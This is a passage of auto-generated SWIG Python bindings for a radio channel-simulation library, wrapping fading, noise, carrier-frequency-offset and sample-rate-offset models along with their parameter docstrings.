set_cfo_dev_std(self, *args, **kwargs): """set_cfo_dev_std(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_cfo_dev_std(self, *args, **kwargs) def set_cfo_dev_max(self, *args, **kwargs): """set_cfo_dev_max(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_cfo_dev_max(self, *args, **kwargs) def set_noise_amp(self, *args, **kwargs): """set_noise_amp(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_noise_amp(self, *args, **kwargs) def set_doppler_freq(self, *args, **kwargs): """set_doppler_freq(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_doppler_freq(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(dynamic_channel_model self, double arg2)""" return _channels_swig.dynamic_channel_model_set_K(self, *args, **kwargs) __swig_destroy__ = _channels_swig.delete_dynamic_channel_model __del__ = lambda self : None; dynamic_channel_model_swigregister = _channels_swig.dynamic_channel_model_swigregister dynamic_channel_model_swigregister(dynamic_channel_model) def dynamic_channel_model_make(*args, **kwargs): """ dynamic_channel_model_make(double samp_rate, double sro_std_dev, double sro_max_dev, double cfo_std_dev, double cfo_max_dev, unsigned int N, double doppler_freq, bool LOS_model, float K, pmt_vector_float delays, pmt_vector_float mags, int ntaps_mpath, double noise_amp, double noise_seed) -> dynamic_channel_model_sptr dynamic channel 
simulator This block implements a dynamic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set up an AWGN noise cource, a random walk process to simulate carrier frequency drift, a random walk process to simulate sample rate offset drive, and a frequency selective fading channel response that is either Rayleigh or Ricean for a user specified power delay profile. Constructor Specific Documentation: Build the dynamic channel simulator. Args: samp_rate : Input sample rate in Hz sro_std_dev : sample rate drift process standard deviation per sample in Hz sro_max_dev : maximum sample rate offset in Hz cfo_std_dev : carrier frequnecy drift process standard deviation per sample in Hz cfo_max_dev : maximum carrier frequency offset in Hz N : number of sinusoids used in frequency selective fading simulation doppler_freq : maximum doppler frequency used in fading simulation in Hz LOS_model : defines whether the fading model should include a line of site component. LOS->Rician, NLOS->Rayleigh K : Rician K-factor, the ratio of specular to diffuse power in the model delays : A list of fractional sample delays making up the power delay profile mags : A list of magnitudes corresponding to each delay time in the power delay profile ntaps_mpath : The length of the filter to interpolate the power delay profile over. Delays in the PDP must lie between 0 and ntaps_mpath, fractional delays will be sinc-interpolated only to the width of this filter. noise_amp : Specifies the standard deviation of the AWGN process noise_seed : A random number generator seed for the noise source. """ return _channels_swig.dynamic_channel_model_make(*args, **kwargs) class fading_model(object): """ fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(unsigned int N, float fDTs=0.01, bool LOS=True, float K=4, int seed=0) -> fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? 
selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators """ return _channels_swig.fading_model_make(*args, **kwargs) make = staticmethod(make) def fDTs(self): """fDTs(fading_model self) -> float""" return _channels_swig.fading_model_fDTs(self) def K(self): """K(fading_model self) -> float""" return _channels_swig.fading_model_K(self) def step(self): """step(fading_model self) -> float""" return _channels_swig.fading_model_step(self) def set_fDTs(self, *args, **kwargs): """set_fDTs(fading_model self, float fDTs)""" return _channels_swig.fading_model_set_fDTs(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(fading_model self, float K)""" return _channels_swig.fading_model_set_K(self, *args, **kwargs) def set_step(self, *args, **kwargs): """set_step(fading_model self, float step)""" return _channels_swig.fading_model_set_step(self, *args, **kwargs) __swig_destroy__ = _channels_swig.delete_fading_model __del__ = lambda self : None; fading_model_swigregister = _channels_swig.fading_model_swigregister fading_model_swigregister(fading_model) def fading_model_make(*args, **kwargs): """ fading_model_make(unsigned int N, float fDTs=0.01, bool LOS=True, float K=4, int seed=0) -> fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators """ return _channels_swig.fading_model_make(*args, **kwargs) class selective_fading_model(object): """ fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators delays : A vector of values the specify the time delay of each impulse mags : A vector of values that specifies the magnitude of each impulse ntaps : The number of filter taps. """ thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(unsigned int N, float fDTs, bool LOS, float K, int seed, pmt_vector_float delays, pmt_vector_float mags, int ntaps) -> selective_fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. 
Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators delays : A vector of values the specify the time delay of each impulse mags : A vector of values that specifies the magnitude of each impulse ntaps : The number of filter taps. """ return _channels_swig.selective_fading_model_make(*args, **kwargs) make = staticmethod(make) def fDTs(self): """fDTs(selective_fading_model self) -> float""" return _channels_swig.selective_fading_model_fDTs(self) def K(self): """K(selective_fading_model self) -> float""" return _channels_swig.selective_fading_model_K(self) def step(self): """step(selective_fading_model self) -> float""" return _channels_swig.selective_fading_model_step(self) def set_fDTs(self, *args, **kwargs): """set_fDTs(selective_fading_model self, float fDTs)""" return _channels_swig.selective_fading_model_set_fDTs(self, *args, **kwargs) def set_K(self, *args, **kwargs): """set_K(selective_fading_model self, float K)""" return _channels_swig.selective_fading_model_set_K(self, *args, **kwargs) def set_step(self, *args, **kwargs): """set_step(selective_fading_model self, float step)""" return _channels_swig.selective_fading_model_set_step(self, *args, **kwargs) __swig_destroy__ = _channels_swig.delete_selective_fading_model __del__ = lambda self : None; selective_fading_model_swigregister = _channels_swig.selective_fading_model_swigregister selective_fading_model_swigregister(selective_fading_model) cvar = _channels_swig.cvar default_delays = cvar.default_delays default_mags = cvar.default_mags def selective_fading_model_make(*args, **kwargs): """ selective_fading_model_make(unsigned int N, float fDTs, bool LOS, float K, int seed, pmt_vector_float delays, pmt_vector_float mags, int ntaps) -> selective_fading_model_sptr fading simulator This block implements a basic fading model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. Constructor Specific Documentation: Build the channel simulator. Args: N : The number of sinusiods to use in simulating the channel; 8 is a good value fDTs : normalized maximum Doppler frequency, fD * Ts LOS : include Line-of-Site path? selects between Rayleigh (NLOS) and Rician (LOS) models K : Rician factor (ratio of the specular power to the scattered power) seed : a random number to seed the noise generators delays : A vector of values the specify the time delay of each impulse mags : A vector of values that specifies the magnitude of each impulse ntaps : The number of filter taps. """ return _channels_swig.selective_fading_model_make(*args, **kwargs) class sro_model(object): """ Sample Rate Offset Model. This block implements a model that varies sample rate offset with respect to time by performing a random walk on the interpolation rate. Constructor Specific Documentation: Build the sample rate offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum sample rate deviation from zero in Hz. noise_seed : A random number generator seed for the noise source. 
""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') def __init__(self, *args, **kwargs): raise AttributeError("No constructor defined - class is abstract") __repr__ = _swig_repr def make(*args, **kwargs): """ make(double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> sro_model_sptr Sample Rate Offset Model. This block implements a model that varies sample rate offset with respect to time by performing a random walk on the interpolation rate. Constructor Specific Documentation: Build the sample rate offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum sample rate deviation from zero in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.sro_model_make(*args, **kwargs) make = staticmethod(make) def set_std_dev(self, *args, **kwargs): """set_std_dev(sro_model self, double _dev)""" return _channels_swig.sro_model_set_std_dev(self, *args, **kwargs) def set_max_dev(self, *args, **kwargs): """set_max_dev(sro_model self, double _dev)""" return _channels_swig.sro_model_set_max_dev(self, *args, **kwargs) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(sro_model self, double _rate)""" return _channels_swig.sro_model_set_samp_rate(self, *args, **kwargs) def std_dev(self): """std_dev(sro_model self) -> double""" return _channels_swig.sro_model_std_dev(self) def max_dev(self): """max_dev(sro_model self) -> double""" return _channels_swig.sro_model_max_dev(self) def samp_rate(self): """samp_rate(sro_model self) -> double""" return _channels_swig.sro_model_samp_rate(self) __swig_destroy__ = _channels_swig.delete_sro_model __del__ = lambda self : None; sro_model_swigregister = _channels_swig.sro_model_swigregister sro_model_swigregister(sro_model) def sro_model_make(*args, **kwargs): """ sro_model_make(double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> sro_model_sptr Sample Rate Offset Model. This block implements a model that varies sample rate offset with respect to time by performing a random walk on the interpolation rate. Constructor Specific Documentation: Build the sample rate offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum sample rate deviation from zero in Hz. noise_seed : A random number generator seed for the noise source. 
""" return _channels_swig.sro_model_make(*args, **kwargs) class channel_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::channel_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::channel_model)> self) -> channel_model_sptr __init__(boost::shared_ptr<(gr::channels::channel_model)> self, channel_model p) -> channel_model_sptr """ this = _channels_swig.new_channel_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(channel_model_sptr self) -> channel_model""" return _channels_swig.channel_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_channel_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(channel_model_sptr self, double noise_voltage=0.0, double frequency_offset=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model_sptr Basic channel simulator. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), a (normalized) frequency offset (), a sample timing offset (), and a seed () to randomize or make reproducable the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . To simulate a channel with time-variant channel, use gr::channels::channel_model2. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). frequency_offset : The normalized frequency offset. 0 is no offset; 0.25 would be, for a digital modem, one quarter of the symbol rate. epsilon : The sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. 
""" return _channels_swig.channel_model_sptr_make(self, *args, **kwargs) def set_noise_voltage(self, *args, **kwargs): """set_noise_voltage(channel_model_sptr self, double noise_voltage)""" return _channels_swig.channel_model_sptr_set_noise_voltage(self, *args, **kwargs) def set_frequency_offset(self, *args, **kwargs): """set_frequency_offset(channel_model_sptr self, double frequency_offset)""" return _channels_swig.channel_model_sptr_set_frequency_offset(self, *args, **kwargs) def set_taps(self, *args, **kwargs): """set_taps(channel_model_sptr self, pmt_vector_cfloat taps)""" return _channels_swig.channel_model_sptr_set_taps(self, *args, **kwargs) def set_timing_offset(self, *args, **kwargs): """set_timing_offset(channel_model_sptr self, double epsilon)""" return _channels_swig.channel_model_sptr_set_timing_offset(self, *args, **kwargs) def noise_voltage(self): """noise_voltage(channel_model_sptr self) -> double""" return _channels_swig.channel_model_sptr_noise_voltage(self) def frequency_offset(self): """frequency_offset(channel_model_sptr self) -> double""" return _channels_swig.channel_model_sptr_frequency_offset(self) def taps(self): """taps(channel_model_sptr self) -> pmt_vector_cfloat""" return _channels_swig.channel_model_sptr_taps(self) def timing_offset(self): """timing_offset(channel_model_sptr self) -> double""" return _channels_swig.channel_model_sptr_timing_offset(self) def primitive_connect(self, *args): """ primitive_connect(channel_model_sptr self, basic_block_sptr block) primitive_connect(channel_model_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.channel_model_sptr_primitive_connect(self, *args) def primitive_msg_connect(self, *args): """ primitive_msg_connect(channel_model_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_connect(channel_model_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.channel_model_sptr_primitive_msg_connect(self, *args) def primitive_msg_disconnect(self, *args): """ primitive_msg_disconnect(channel_model_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_disconnect(channel_model_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.channel_model_sptr_primitive_msg_disconnect(self, *args) def primitive_disconnect(self, *args): """ primitive_disconnect(channel_model_sptr self, basic_block_sptr block) primitive_disconnect(channel_model_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.channel_model_sptr_primitive_disconnect(self, *args) def disconnect_all(self): """disconnect_all(channel_model_sptr self)""" return _channels_swig.channel_model_sptr_disconnect_all(self) def lock(self): """lock(channel_model_sptr self)""" return _channels_swig.channel_model_sptr_lock(self) def unlock(self): """unlock(channel_model_sptr self)""" return _channels_swig.channel_model_sptr_unlock(self) def primitive_message_port_register_hier_in(self, *args, **kwargs): """primitive_message_port_register_hier_in(channel_model_sptr self, swig_int_ptr port_id)""" return _channels_swig.channel_model_sptr_primitive_message_port_register_hier_in(self, *args, **kwargs) def primitive_message_port_register_hier_out(self, *args, **kwargs): 
"""primitive_message_port_register_hier_out(channel_model_sptr self, swig_int_ptr port_id)""" return _channels_swig.channel_model_sptr_primitive_message_port_register_hier_out(self, *args, **kwargs) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(channel_model_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return _channels_swig.channel_model_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(channel_model_sptr self)""" return _channels_swig.channel_model_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(channel_model_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.channel_model_sptr_processor_affinity(self) def to_hier_block2(self): """to_hier_block2(channel_model_sptr self) -> hier_block2_sptr""" return _channels_swig.channel_model_sptr_to_hier_block2(self) def name(self): """name(channel_model_sptr self) -> std::string""" return _channels_swig.channel_model_sptr_name(self) def symbol_name(self): """symbol_name(channel_model_sptr self) -> std::string""" return _channels_swig.channel_model_sptr_symbol_name(self) def input_signature(self): """input_signature(channel_model_sptr self) -> io_signature_sptr""" return _channels_swig.channel_model_sptr_input_signature(self) def output_signature(self): """output_signature(channel_model_sptr self) -> io_signature_sptr""" return _channels_swig.channel_model_sptr_output_signature(self) def unique_id(self): """unique_id(channel_model_sptr self) -> long""" return _channels_swig.channel_model_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(channel_model_sptr self) -> basic_block_sptr""" return _channels_swig.channel_model_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(channel_model_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.channel_model_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(channel_model_sptr self) -> std::string""" return _channels_swig.channel_model_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(channel_model_sptr self, std::string name)""" return _channels_swig.channel_model_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(channel_model_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.channel_model_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(channel_model_sptr self) -> swig_int_ptr""" return _channels_swig.channel_model_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(channel_model_sptr self) -> swig_int_ptr""" return _channels_swig.channel_model_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(channel_model_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.channel_model_sptr_message_subscribers(self, *args, **kwargs) channel_model_sptr_swigregister = _channels_swig.channel_model_sptr_swigregister channel_model_sptr_swigregister(channel_model_sptr) channel_model_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) channel_model = channel_model.make; class channel_model2_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::channel_model2)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr 
def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::channel_model2)> self) -> channel_model2_sptr __init__(boost::shared_ptr<(gr::channels::channel_model2)> self, channel_model2 p) -> channel_model2_sptr """ this = _channels_swig.new_channel_model2_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): """__deref__(channel_model2_sptr self) -> channel_model2""" return _channels_swig.channel_model2_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_channel_model2_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(channel_model2_sptr self, double noise_voltage=0.0, double epsilon=1.0, pmt_vector_cfloat taps=std::vector< gr_complex >(1,1), double noise_seed=0, bool block_tags=False) -> channel_model2_sptr Basic channel simulator allowing time-varying frequency and timing inputs. This block implements a basic channel model simulator that can be used to help evaluate, design, and test various signals, waveforms, and algorithms. This model allows the user to set the voltage of an AWGN noise source (), an initial timing offset (), and a seed () to randomize the AWGN noise source. Multipath can be approximated in this model by using a FIR filter representation of a multipath delay profile with the parameter . Unlike gr::channels::channel_model, this block is designed to enable time-varying frequency and timing offsets. Since the models for frequency and timing offset may vary and what we are trying to model may be different for different simulations, we provide the time-varying nature as an input function that is user-defined. If only constant frequency and timing offsets are required, it is easier and less expensive to use gr::channels::channel_model. Constructor Specific Documentation: Build the channel simulator. Args: noise_voltage : The AWGN noise level as a voltage (to be calculated externally to meet, say, a desired SNR). epsilon : The initial sample timing offset to emulate the different rates between the sample clocks of the transmitter and receiver. 1.0 is no difference. taps : Taps of a FIR filter to emulate a multipath delay profile. noise_seed : A random number generator seed for the noise source. block_tags : If true, tags will not be able to propagate through this block. 
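Example (illustrative sketch; values are arbitrary and the gnuradio.channels namespace is assumed; the time-varying frequency and timing offsets are supplied as additional input streams to the block, as described above):

    from gnuradio import channels
    chan2 = channels.channel_model2(noise_voltage=0.05,
                                    epsilon=1.0,
                                    taps=[1.0],
                                    noise_seed=7)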
""" return _channels_swig.channel_model2_sptr_make(self, *args, **kwargs) def set_noise_voltage(self, *args, **kwargs): """set_noise_voltage(channel_model2_sptr self, double noise_voltage)""" return _channels_swig.channel_model2_sptr_set_noise_voltage(self, *args, **kwargs) def set_taps(self, *args, **kwargs): """set_taps(channel_model2_sptr self, pmt_vector_cfloat taps)""" return _channels_swig.channel_model2_sptr_set_taps(self, *args, **kwargs) def set_timing_offset(self, *args, **kwargs): """set_timing_offset(channel_model2_sptr self, double epsilon)""" return _channels_swig.channel_model2_sptr_set_timing_offset(self, *args, **kwargs) def noise_voltage(self): """noise_voltage(channel_model2_sptr self) -> double""" return _channels_swig.channel_model2_sptr_noise_voltage(self) def taps(self): """taps(channel_model2_sptr self) -> pmt_vector_cfloat""" return _channels_swig.channel_model2_sptr_taps(self) def timing_offset(self): """timing_offset(channel_model2_sptr self) -> double""" return _channels_swig.channel_model2_sptr_timing_offset(self) def primitive_connect(self, *args): """ primitive_connect(channel_model2_sptr self, basic_block_sptr block) primitive_connect(channel_model2_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.channel_model2_sptr_primitive_connect(self, *args) def primitive_msg_connect(self, *args): """ primitive_msg_connect(channel_model2_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_connect(channel_model2_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.channel_model2_sptr_primitive_msg_connect(self, *args) def primitive_msg_disconnect(self, *args): """ primitive_msg_disconnect(channel_model2_sptr self, basic_block_sptr src, swig_int_ptr srcport, basic_block_sptr dst, swig_int_ptr dstport) primitive_msg_disconnect(channel_model2_sptr self, basic_block_sptr src, std::string srcport, basic_block_sptr dst, std::string dstport) """ return _channels_swig.channel_model2_sptr_primitive_msg_disconnect(self, *args) def primitive_disconnect(self, *args): """ primitive_disconnect(channel_model2_sptr self, basic_block_sptr block) primitive_disconnect(channel_model2_sptr self, basic_block_sptr src, int src_port, basic_block_sptr dst, int dst_port) """ return _channels_swig.channel_model2_sptr_primitive_disconnect(self, *args) def disconnect_all(self): """disconnect_all(channel_model2_sptr self)""" return _channels_swig.channel_model2_sptr_disconnect_all(self) def lock(self): """lock(channel_model2_sptr self)""" return _channels_swig.channel_model2_sptr_lock(self) def unlock(self): """unlock(channel_model2_sptr self)""" return _channels_swig.channel_model2_sptr_unlock(self) def primitive_message_port_register_hier_in(self, *args, **kwargs): """primitive_message_port_register_hier_in(channel_model2_sptr self, swig_int_ptr port_id)""" return _channels_swig.channel_model2_sptr_primitive_message_port_register_hier_in(self, *args, **kwargs) def primitive_message_port_register_hier_out(self, *args, **kwargs): """primitive_message_port_register_hier_out(channel_model2_sptr self, swig_int_ptr port_id)""" return _channels_swig.channel_model2_sptr_primitive_message_port_register_hier_out(self, *args, **kwargs) def set_processor_affinity(self, *args, **kwargs): """set_processor_affinity(channel_model2_sptr self, std::vector< int,std::allocator< int > > const & mask)""" return 
_channels_swig.channel_model2_sptr_set_processor_affinity(self, *args, **kwargs) def unset_processor_affinity(self): """unset_processor_affinity(channel_model2_sptr self)""" return _channels_swig.channel_model2_sptr_unset_processor_affinity(self) def processor_affinity(self): """processor_affinity(channel_model2_sptr self) -> std::vector< int,std::allocator< int > >""" return _channels_swig.channel_model2_sptr_processor_affinity(self) def to_hier_block2(self): """to_hier_block2(channel_model2_sptr self) -> hier_block2_sptr""" return _channels_swig.channel_model2_sptr_to_hier_block2(self) def name(self): """name(channel_model2_sptr self) -> std::string""" return _channels_swig.channel_model2_sptr_name(self) def symbol_name(self): """symbol_name(channel_model2_sptr self) -> std::string""" return _channels_swig.channel_model2_sptr_symbol_name(self) def input_signature(self): """input_signature(channel_model2_sptr self) -> io_signature_sptr""" return _channels_swig.channel_model2_sptr_input_signature(self) def output_signature(self): """output_signature(channel_model2_sptr self) -> io_signature_sptr""" return _channels_swig.channel_model2_sptr_output_signature(self) def unique_id(self): """unique_id(channel_model2_sptr self) -> long""" return _channels_swig.channel_model2_sptr_unique_id(self) def to_basic_block(self): """to_basic_block(channel_model2_sptr self) -> basic_block_sptr""" return _channels_swig.channel_model2_sptr_to_basic_block(self) def check_topology(self, *args, **kwargs): """check_topology(channel_model2_sptr self, int ninputs, int noutputs) -> bool""" return _channels_swig.channel_model2_sptr_check_topology(self, *args, **kwargs) def alias(self): """alias(channel_model2_sptr self) -> std::string""" return _channels_swig.channel_model2_sptr_alias(self) def set_block_alias(self, *args, **kwargs): """set_block_alias(channel_model2_sptr self, std::string name)""" return _channels_swig.channel_model2_sptr_set_block_alias(self, *args, **kwargs) def _post(self, *args, **kwargs): """_post(channel_model2_sptr self, swig_int_ptr which_port, swig_int_ptr msg)""" return _channels_swig.channel_model2_sptr__post(self, *args, **kwargs) def message_ports_in(self): """message_ports_in(channel_model2_sptr self) -> swig_int_ptr""" return _channels_swig.channel_model2_sptr_message_ports_in(self) def message_ports_out(self): """message_ports_out(channel_model2_sptr self) -> swig_int_ptr""" return _channels_swig.channel_model2_sptr_message_ports_out(self) def message_subscribers(self, *args, **kwargs): """message_subscribers(channel_model2_sptr self, swig_int_ptr which_port) -> swig_int_ptr""" return _channels_swig.channel_model2_sptr_message_subscribers(self, *args, **kwargs) channel_model2_sptr_swigregister = _channels_swig.channel_model2_sptr_swigregister channel_model2_sptr_swigregister(channel_model2_sptr) channel_model2_sptr.__repr__ = lambda self: "<gr_block %s (%d)>" % (self.name(), self.unique_id()) channel_model2 = channel_model2.make; class cfo_model_sptr(object): """Proxy of C++ boost::shared_ptr<(gr::channels::cfo_model)> class""" thisown = _swig_property(lambda x: x.this.own(), lambda x, v: x.this.own(v), doc='The membership flag') __repr__ = _swig_repr def __init__(self, *args): """ __init__(boost::shared_ptr<(gr::channels::cfo_model)> self) -> cfo_model_sptr __init__(boost::shared_ptr<(gr::channels::cfo_model)> self, cfo_model p) -> cfo_model_sptr """ this = _channels_swig.new_cfo_model_sptr(*args) try: self.this.append(this) except: self.this = this def __deref__(self): 
"""__deref__(cfo_model_sptr self) -> cfo_model""" return _channels_swig.cfo_model_sptr___deref__(self) __swig_destroy__ = _channels_swig.delete_cfo_model_sptr __del__ = lambda self : None; def make(self, *args, **kwargs): """ make(cfo_model_sptr self, double sample_rate_hz, double std_dev_hz, double max_dev_hz, double noise_seed=0) -> cfo_model_sptr channel simulator This block implements a carrier frequency offset model that can be used to simulate carrier frequency drift typically from mixer LO drift on either transmit or receive hardware. A clipped gaussian random walk process is used. Constructor Specific Documentation: Build the carrier frequency offset model. Args: sample_rate_hz : Sample rate of the input signal in Hz std_dev_hz : Desired standard deviation of the random walk process every sample in Hz max_dev_hz : Maximum carrier frequency deviation in Hz. noise_seed : A random number generator seed for the noise source. """ return _channels_swig.cfo_model_sptr_make(self, *args, **kwargs) def set_std_dev(self, *args, **kwargs): """set_std_dev(cfo_model_sptr self, double _dev)""" return _channels_swig.cfo_model_sptr_set_std_dev(self, *args, **kwargs) def set_max_dev(self, *args, **kwargs): """set_max_dev(cfo_model_sptr self, double _dev)""" return _channels_swig.cfo_model_sptr_set_max_dev(self, *args, **kwargs) def set_samp_rate(self, *args, **kwargs): """set_samp_rate(cfo_model_sptr self, double _rate)""" return _channels_swig.cfo_model_sptr_set_samp_rate(self, *args, **kwargs) def std_dev(self): """std_dev(cfo_model_sptr self) -> double""" return _channels_swig.cfo_model_sptr_std_dev(self) def max_dev(self): """max_dev(cfo_model_sptr self) -> double""" return _channels_swig.cfo_model_sptr_max_dev(self) def samp_rate(self): """samp_rate(cfo_model_sptr self) -> double""" return _channels_swig.cfo_model_sptr_samp_rate(self) def history(self): """history(cfo_model_sptr self) -> unsigned int""" return _channels_swig.cfo_model_sptr_history(self) def declare_sample_delay(self, *args): """ declare_sample_delay(cfo_model_sptr self, int which, int delay) declare_sample_delay(cfo_model_sptr self, unsigned int delay) """ return _channels_swig.cfo_model_sptr_declare_sample_delay(self, *args) def sample_delay(self, *args, **kwargs): """sample_delay(cfo_model_sptr self, int which) -> unsigned int""" return _channels_swig.cfo_model_sptr_sample_delay(self, *args, **kwargs) def output_multiple(self): """output_multiple(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_output_multiple(self) def relative_rate(self): """relative_rate(cfo_model_sptr self) -> double""" return _channels_swig.cfo_model_sptr_relative_rate(self) def start(self): """start(cfo_model_sptr self) -> bool""" return _channels_swig.cfo_model_sptr_start(self) def stop(self): """stop(cfo_model_sptr self) -> bool""" return _channels_swig.cfo_model_sptr_stop(self) def nitems_read(self, *args, **kwargs): """nitems_read(cfo_model_sptr self, unsigned int which_input) -> uint64_t""" return _channels_swig.cfo_model_sptr_nitems_read(self, *args, **kwargs) def nitems_written(self, *args, **kwargs): """nitems_written(cfo_model_sptr self, unsigned int which_output) -> uint64_t""" return _channels_swig.cfo_model_sptr_nitems_written(self, *args, **kwargs) def max_noutput_items(self): """max_noutput_items(cfo_model_sptr self) -> int""" return _channels_swig.cfo_model_sptr_max_noutput_items(self) def set_max_noutput_items(self, *args, **kwargs): """set_max_noutput_items(cfo_model_sptr self, int m)""" return 
